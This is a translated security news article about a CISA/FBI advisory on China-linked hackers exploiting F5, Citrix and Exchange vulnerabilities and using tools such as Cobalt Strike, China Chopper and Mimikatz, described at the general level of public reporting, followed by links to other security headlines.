Tuesday, October 20, 15:51
Home security China: Funds hackers for attacks in the US using Exchange, Citrix, F5 ...

China: Funds hackers for attacks in the US by exploiting Exchange, Citrix, F5 bugs!

The US government warns of Chinese-funded hackers to carry out attacks in government services, taking advantage of bugs in Microsoft Exchange, Citrix and F5 devices and servers.

More specifically, the CISA and FBI warn that hackers linked to China's Ministry of State Security (MMS) attack US government agencies and private companies, exploiting bugs in publicly exposed systems.

China vs USA

According to a recent indictment by the US Department of Justice, hackers linked to the MSS have targeted various industries in both the US and other countries. Among the industries that have been found in their sights are high-tech manufacturers, manufacturers of medical devices, civil services, educational institutions, pharmaceutical companies as well as the defense of target countries. These are attacks carried out in the context of a campaign which lasted more than ten years. These Chinese-funded hackers acted both for their own benefit and for the benefit of the Chinese MSS.

In their attacks, hackers linked to China search for vulnerable and publicly exposed devices using the search engine Shodan and vulnerability databases, such as CVE (Common Vulnerabilities and Exposure) and NVD (National Vulnerabilities Database).

hackers China-Exchange Citrix F5 bugs

In accordance with BleepingComputer, CISA has noticed that hackers target bugs in F5, Citrix and Microsoft Exchange Server to obtain access in an organization's network and collect data. According to CISA, the most notable Exchange, Citrix and F5 bugs that have been targeted by hackers are the following:

  • CVE-2020-5902: Bug on Big-IP F5 - This bug allows a remote intruder to access the TMUI (Traffic Management User Interface) of the BIG-IP application delivery controller (ADC) without authentication, as well as to proceed with remote execution code.
  • CVE-2019-19781: Citrix VPN Appliances - Bugs on Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP allow unauthorized intruders to execute remote commands to gain access to a network.
  • CVE-2020-0688: Microsoft Exchange Server - This bug is present in the Exchange Control Panel (ECP) component and is caused by Exchange failing to generate unique cryptographic keys during installation. Once exploited, intruders can execute remote code execution (RCE) on server with system privileges.
Exchange Citrix F5 bugs

In addition, once a network is compromised, Chinese-funded hackers download a set of tools that allow them to gain further access to computers on the compromised network. According to CISA, hackers usually download specific tools to enhance their attacks. Some of them are the following:

Cobalt Strike: Cobalt Strike is a legitimate opponent simulation platform intended for use by professionals security, to evaluate the security of a network. Hackers use crafted URIs as part of their attacks to backdoor access to compromised systems and to develop additional tools on the target network.

China Chopper Web Shell: This tool allows hackers to install PHP, ASP, ASPX, JSP and CFM webshells (backdoor) on publicly exposed web servers. Once the China Chopper Web Shell is installed, hackers gain full access to a remote server through the exposed site.

Mimikatz: Mimikatz is a tool that allows hackers to steal Windows credentials stored in the memory of a computer. This tool is commonly used by hackers, along with features ransomware, to gain access to admin credentials and violate their domain controllers Windows.

Using the above three tools, hackers can spread from a compromised system to other devices, until they gain full control of the targeted network. In addition, CISA warns that hackers are exploiting the Microsoft Exchange CVE-2020-0688 RCE bug to collect emails from exchange servers located in Federal Government environments.

CISA-FBI proposals

Therefore, the CISA and the FBI recommend that agencies monitor their infrastructure on a daily basis and update their management plans. They are also advised to regularly check configuration programs to ensure that they can monitor and mitigate emerging threats. Thus, they will prevent possible "operations" of sophisticated cyber threat agents and will protect their resources and information.


Please enter your comment!
Please enter your name here

Every accomplishment starts with the decision to try.


How to stop the automatic switching of AirPods between iPhone and iPad

AirPods and AirPods Pro automatically switch between iPhone and iPad. If you turn off the iPad and start a call on your iPhone, ...

The Windows 10 KB4579311 update has an installation problem

Windows 10 users face many problems when installing the latest cumulative update KB4579311 and those who can ...

The big "Twitter hack" was the result of employee fraud

The biggest Twitter hack that has become known to date, was the one that took place last July and resulted in ...

Gang ransomware donates part of ransom to charities

The Darkside ransomware gang has donated 10 thousand dollars from the ransom it has collected from its victims to Children International ...

FinCEN fines $ 60 million companies for bitcoin money laundering

The US Treasury Department's Financial Crimes Enforcement Network (FinCEN) today announced the first sentence against cryptocurrency services, Helix and ...

US: accuse Russians of global attacks

Six Russian agents have been indicted by the US Department of Justice for attacks related to the Winter Olympics in Pyeongchang, ...

Hackers hijack Telegram via an SS7 attack

Hackers with access to the Signaling System 7 (SS7) used to connect to mobile networks around the world were able to ...

Windows GravityRAT malware now targets Android and macOS

GravityRAT, a malware that monitors the CPU temperature of Windows computers to detect virtual machines or sandboxes, has acquired additional ...

DDoS attacks tripled, forcing victims to pay a ransom

The last quarter of 2020 saw a wave of web application attacks that have used ransom letters to target companies in various industries ....

Phishing campaign violates Office 365 accounts through OAuth app

Security researchers have discovered a new phishing campaign that uses a Coinbase-themed email. Target of the hackers behind the campaign, ...